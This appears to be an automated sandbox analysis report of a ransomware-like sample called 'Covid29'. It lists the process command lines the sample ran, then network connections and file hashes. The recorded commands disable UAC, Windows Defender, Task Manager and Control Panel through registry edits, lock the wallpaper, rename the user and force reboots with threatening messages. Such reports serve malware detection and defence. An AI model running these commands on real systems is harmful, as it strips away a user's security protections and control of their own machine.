C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\A914.tmp\scarr.mp4"
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CreepScreen.exe
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im melter.exe
C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"IT'S TOO LATE!!!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
C:\Windows\SysWOW64\timeout.exe
timeout 8 /nobreak
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\AEF0.tmp\scarr.mp4"
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f8 0x2fc
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"IT'S TOO LATE!!!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
C:\Windows\SysWOW64\timeout.exe
timeout 8 /nobreak
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CreepScreen.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im melter.exe
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\C67F.tmp\scarr.mp4"
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"IT'S TOO LATE!!!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
C:\Windows\SysWOW64\timeout.exe
timeout 8 /nobreak
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1940 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,1936709834566088623,2977675678569896880,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6108 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38f5855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| NL | 142.250.179.142:80 | google.com | tcp |
| NL | 142.250.179.142:80 | google.com | tcp |
| NL | 172.217.168.196:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | 142.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| NL | 142.250.179.206:443 | ogs.google.com | tcp |
| DE | 172.217.23.206:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| DE | 172.217.23.195:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 195.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.33.253.131.in-addr.arpa | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 98.39.251.142.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lh5.googleusercontent.com | udp |
| NL | 142.251.36.1:443 | lh5.googleusercontent.com | tcp |
| NL | 142.251.36.1:443 | lh5.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | 1.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| NL | 142.250.179.163:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | 163.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| NL | 142.251.36.14:443 | encrypted-tbn0.gstatic.com | udp |
| NL | 142.250.179.163:443 | id.google.com | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.113.4:443 | github.com | tcp |
| US | 140.82.113.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | 4.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.112.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 5.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.57.101.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 140.82.113.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.6:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4aab618ef3d86f2fbf808c4ac50ab083 |
| SHA1 | 3f794d5499a16d7048809b46589984a065164ed0 |
| SHA256 | 4971c4c535809b9ffe1b1d9b22e7d9ade38d51a4406def14c54708a87c2e4dc2 |
| SHA512 | 21adbdb317cb85cbcb370003a09fa6f75fd8ba65b4453d33f6f3abd6449c9c0ce97a9480fd5c058885a264364b2c00e7979a7bd285b76b296c56f85e207babeb |
\??\pipe\LOCAL\crashpad_2580_PKWRLELZEXFCVMAQ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8c7e49ac9fe8830787a3f8e642b1c85a |
| SHA1 | 93c4941cec8ead8330fed3b54dc7f8999e45a9be |
| SHA256 | 1aa8155b8a8eb52f73621c05a90a9488f130866365e5d72b0b6f4f7e97721629 |
| SHA512 | c30d371594ef628e59846db1e66f331454d2720848144c14f88614adec7d963724c5cc4346c6e413ec6b74984bed2f6cff62fab2e0261d195fd999fd197fd41f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | fe65730d0de96c4383cee94736370411 |
| SHA1 | 1e6b771a8c6c122ffacb53cdd2822873cb63987b |
| SHA256 | c1bcabc5d3974835b5d5983f47bb626311b6e6f85bd3b77a6fbcc10d437c1bb9 |
| SHA512 | 4fc6b92feff2d7903744fe7f0ab51b1e0da5b146b297e83a304b801e7e11b6efd37d8de6ee3b9fc4327efe7020c26c17260bd6bf474eacc22e5ac5e9f23ba209 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 02863f5f3a996e5ca812f3064affdf72 |
| SHA1 | 7601f1b2accf68fac44ba62c7c4dc7665034c46e |
| SHA256 | 50052329928277e0fd44c6b8cd8b081466540eec4131eb2c82923baa36ac310d |
| SHA512 | 25dce01429a8ea1b4e673596c0e2a29d29b9a1b051857f23ba4e16f7a3ceb035ec854cab98115ce02542c26680f2c69bd45f748abe544d9a1151807d87b242bc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\06f156ce-12ac-4051-bbc5-05a5c572c5e8.tmp
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 7caf65193db27a3b881dfb25b62ce529 |
| SHA1 | 304e35e18f36b79acae60f4a426f0ab861a651b5 |
| SHA256 | eaa4cdd8c166fc998235daec7bdc3fc2a9ef1e2207be2f4eabb8fbb564ead890 |
| SHA512 | 96231ea6ea8f879e0d2f48fd7bca3480ef78df283d135a1f631faf701215c4d9477b1a8eb59a24b8f08d060b71e250e04deaf49ea08758993b77199a6bc5cd69 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 486c6533a423ed798c61773a3fbf7655 |
| SHA1 | 33fb361dd3d90c7fa9079be2c06261471e3ba36d |
| SHA256 | 4776ac062fb24399f4df01d4f5996b6ea22be3c5bcf18b7f1007e28606dde516 |
| SHA512 | ee2f83dabded65c8016f54d08be6f21db37d29c3f8ecee2683b88bbe582bd77eac43fc384a6da6e5dc365c966da124f261f8db20e33cd3b5b71ca9e029e89685 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5800b7.TMP
| MD5 | 180b09c2addd831fdd8e11a6b5be29fe |
| SHA1 | a6b50025b5bed15ba2d2629eb846230e40324543 |
| SHA256 | e695c830c498b29690d8b3d0f9f9da3a4e0061f94cc929c109407bd5c3baac15 |
| SHA512 | b753100184d09d695098605e13395465094d73336509c4c2930f8a92685a43ebe372a1324cf6f2bee3732ccaa9e793d1e55290ed32630cfdc65422a4b2aa4a65 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 004f854b609d83509eddc1a91366e026 |
| SHA1 | a2e3ac83bf65cd29669140eaa3334a81110d77ae |
| SHA256 | 5ed82f6a2f7337f88652dd99c52e21e9d67c5da96456550d145ec31c9ae26110 |
| SHA512 | 89b733ff9485f4b0144419f331bf6f6b927f7d3981abea7aa3a6e0a4eb93e2e2e37d8e833df0fecea16dd356e048f02f13f83dda8c5cf6a1055c97ad88abb1f9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0b9384c39165fcada192add60e7f6a65 |
| SHA1 | d742f3544c05a9e84a03900c705f1a5f033ae703 |
| SHA256 | 6428ba8fbf5a690690f1dd5c56182a9f3575b4feac31a2689f06218f8cdf3f55 |
| SHA512 | 82700b308e21ab4e69723fb5245918384f1248a81a558e6060e83806d7c4f7fae5c28fe57d0615d3e8cb8f478fa2dec76d07950d229d5f469bf38ce2f2621e1a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c
| MD5 | cc5f6921b7e2d3c1ae0da911886291b2 |
| SHA1 | 372dd6699f897f862c20b31452d6d73c927a253c |
| SHA256 | fe9cd27dba601b9236f44337b0cb45a29e22f8b0e46a1e90e4a586ff2c014da3 |
| SHA512 | 1577211e82a11fa304ecf0b853de1045f2d08a61806caae53385fe8ec1fe95804b3034770bfc5cb7b790ab893678550978d663c8b12c2d12a3247e80005731d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d
| MD5 | 035ef6eaf7accadce25b54de51a58b43 |
| SHA1 | 6622e6858ee1349437d58c29fe821390c27cef41 |
| SHA256 | c29fd8d1af7a65a8ee253f331922fe84445b275926596fcefd3d2fcc02bf842a |
| SHA512 | d6a21d79e3f10a9c4ad0b1d0294922a90a8485170e514129b71eb0c287925d6a80b8c4d5e246faaf86964ffe4841aee78a8fb7a3b6c5d4f6fb0a82a73dfb69ef |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | d574939016c1b0511053c934958d9a25 |
| SHA1 | 1ebb35cd6af10fce71dcd4778c9bbcd9822ef999 |
| SHA256 | ad0ad0fb63aff674e004faa8c826d6523a79532133fc07eb9a2ee5a1d367ec66 |
| SHA512 | 48758079cd42e05da63126f5119d15a4f79520095d062b67490b637df8fc12d567eaa2ec9c083d747093fbefedc651fbb3a2bc4f2fbbab9b5a09379626a40ceb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a5a8c677ce981e93844f0e7b682a1ab6 |
| SHA1 | 6feca55535be8d7a4a8be280f0b96269ca61afbd |
| SHA256 | 2e3d1e2c97c572a2387e11dfa9a293eca22d3ecab72f27ff2d869f22d86029e5 |
| SHA512 | 0dd14c10ec04ab0e14565917eeddcb021aa034a16ea53a501104e181bf7d4a2b091270b952d52adabf3960da9d4fcc1851c5da449c2c969c5aa2d33e746453f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 0e313b24e6e339121717c4821ccf621d |
| SHA1 | b146f0c47340700358fbc74ad89c37e4e2821cf7 |
| SHA256 | 669295aacff33b8490a66ac59848f23d46269cf5298fbcafc8102454c77a8679 |
| SHA512 | f5c2a2fac14637fe123873888a779a0d7fb383b44cf4862e801cb1facdf329b9f4b231ecc35e34fd1f9b8911adfcd3ba24ed51a0a1e7e0aeca71924b723e6baf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6bb34f03c35aa4eee639d6a0f0bc4cdf |
| SHA1 | 48eff5536bbbd4691ad48dfd381cb3ba33958019 |
| SHA256 | 2fbca236bcd76029fdd3db7d164855f574d78c5e34a72ac123ceac476faf63dc |
| SHA512 | 2d8a75858d7cb2f33721c5ef6fbfaa5b7ced04b1f683f37d135626670b6fa57e3907d88a86f619e390dad3a94526d28bef95ed78dc98b704eeeceb14e783840e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | e7c317ead1d577db63fc3187ade53536 |
| SHA1 | b87e9f43382e630fe531ef2840a3aefc2c6c0ba6 |
| SHA256 | 10bcc99c64ca293aa9655002178cd284c0188a9f19bafeeb86b063cf8f9a9d99 |
| SHA512 | b5149d473ef11450a7eb8facff7a8d6bddec4951cae42f5f9eb25f50cdc4817b8e847c5012b019d3eaa11209ed4ff70fe4cad5f4f57bdfe0b12680cf2ca2e78e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 09c00e63796ab6ec371a8e538a36c0c7 |
| SHA1 | 75b5c0ce4cfad490779a323a3200f4ff9e14289b |
| SHA256 | 42a2c662f46b23a83ce0d9e480bec618c95e5e370a5a406fe8fc89d48dbab362 |
| SHA512 | b036f2670076598c2066c2fb6318cfc34099f4b6a62c4fa2047c37943c10bfae2a07eaa924d5767fad41fafcb24a3407061a389521842771bf971dfc443fa694 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b8d8ab852084c703039b2d81f76b1732 |
| SHA1 | 1c04d070d8f9a0886418fe6bc5fd722f1dbe6170 |
| SHA256 | c81ff20a3f927bd69d77530faf0adaf1c3a224bc0efa84fb86cfe9c2fb22b22c |
| SHA512 | eb9a10fc9b4dafa63e0174c92e30d32869fde0fef5f9598aef603681c01866c26406746300fc7181789f9a5f9bc572770ef4f4b9d263bf74cfd629c4c2b479fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 39197eb84e52d0d34617b4b79e3cb2b5 |
| SHA1 | 417e21548454de6e34823f22d45c5d3398a7e87b |
| SHA256 | 9cc71549037c98aa16fd271a957d90eb987598632b965a5bf2868bfdf0f82b0d |
| SHA512 | 3dc74e8cefcf6f676e1899a1d1e14f632d49325882b810300c392313f8eb8f70d3c9b9902f1416a612ab2e7f7f487f3b65ab3362cb84b2c8334a950570062023 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 84156f9d8b6b478787630afdf802c70a |
| SHA1 | 1dadcf1ae8da038feb98c1f28f3150509ae04f7d |
| SHA256 | e398160f5d2b091b4da17dc3cab49ccd3c1b4cf9c535dbb3c6bfbaa4c75e62b3 |
| SHA512 | 9535eff069beedde8c39f67716970a14822945ece285f248257254cfd3dba4d383ace37766144d29d4ad633a20ecc1a4c0b39e05b288fe7707ca9d3e11a6f136 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d8d0d17c-eaf1-44c9-ac3f-e848db63be1d.tmp
| MD5 | c5a52dd3c34e6cda7d40f5cd252a3f4c |
| SHA1 | 148f1313220fd2c640bf32c1aec014c32083f363 |
| SHA256 | b876fc25b7743dcf37f3471152b6a95e0306338a6d285ac6f5779a214f590354 |
| SHA512 | d99d3e482f79561d5b1215f1355208b988acac710053abc91f2eba38359a49b240370c12d15a651ce7404e8cf41944ea124210d43866ae075d3de55875c6d3af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5d78edc5afb364a4090a2fdd48599064 |
| SHA1 | 95107172fed1b2f583def8f5ca2f37ed47e48731 |
| SHA256 | 7f57c121682ffbfca884506a7c8ee313fb13f69a9c7c7c0c7fc76dc087ea42e2 |
| SHA512 | bd290c30f4284150978d461bce6527993a258ab9180ff9eeddec5012e30a3a447b975af491e4c6ac9f7cef30a670e7fe87b22b081d5d505c471abbb092ac0984 |
C:\Users\Admin\Downloads\Covid29 Ransomware.zip
| MD5 | 272d3e458250acd2ea839eb24b427ce5 |
| SHA1 | fae7194da5c969f2d8220ed9250aa1de7bf56609 |
| SHA256 | bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3 |
| SHA512 | d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e3c88410a8bc9a1189cfc18a352fc521 |
| SHA1 | a9404398052906745b79c3b666639e66d486eefb |
| SHA256 | 623926fae926d528ea6d173a5f9dcd4fadd3dccabdea5d0e9f782771c511e06c |
| SHA512 | c1b549c6a3dd4b7902e6936fdff85ea2cc02215c0b38d2a3cbb103b1aa2efe8b6b2074d7a1c247b495161073178e72e48fa620f3b88b302d0fe5d6ae67f4e740 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | fd808a590eafc835519229ab93afd7e1 |
| SHA1 | 27f7d631a4ff4e45872149b6cc4e6f95556e11d2 |
| SHA256 | b28c67b074ea2067746354d4729edf04f2bde425d0abe71f554dd110bc7eb27f |
| SHA512 | 109c440612c7b915ec706f4413dad7ec8d5f490d7fa244482347754e2e4181ce6bfe097711bd587ef207fb1f19e610b7339fd6d7f6321b6be892c3ee30e6020e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5062bdc0cb1b8195f51b6fa38ff91bca |
| SHA1 | 13693b0a3487e5ef6d6f727782ec936c4c0210af |
| SHA256 | 42019caa7d642942d82d59edd5e5bdd1f4a9f0a4707d0c608a095c2ecac26c52 |
| SHA512 | f514f3f4e6e15980fa6f1ae8fea45a6319c36195b38e1e473f5944e5ddb7b27ac5a75e182e5ce566a3d276f46a00594bbbbb03b384efbe7af6fce248cc0283d9 |
memory/2440-582-0x0000000000400000-0x00000000005D5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7f2e2ba46e5393145197166d67f76406 |
| SHA1 | 14d9b4c1218fea9bc89dca1093461f01ef0fe4a3 |
| SHA256 | caaf9d707cbd7d6124caa869c3218227ecbaecea467cdd5e49b0874bce819762 |
| SHA512 | a5a0d816a2f12b2fabce844db3a5b74062a46e9a15bc1d8e9d39f5b8494d7555bc80a0374e56067d8d1ef40d8ff85530d8ed4a945167f8cca6ebc1ef785c9384 |
C:\Users\Admin\AppData\Local\Temp\2315.tmp\TrojanRansomCovid29.bat
| MD5 | 57f0432c8e31d4ff4da7962db27ef4e8 |
| SHA1 | d5023b3123c0b7fae683588ac0480cd2731a0c5e |
| SHA256 | b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc |
| SHA512 | bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf |
C:\Users\Admin\AppData\Local\Temp\2315.tmp\fakeerror.vbs
| MD5 | c0437fe3a53e181c5e904f2d13431718 |
| SHA1 | 44f9547e7259a7fb4fe718e42e499371aa188ab6 |
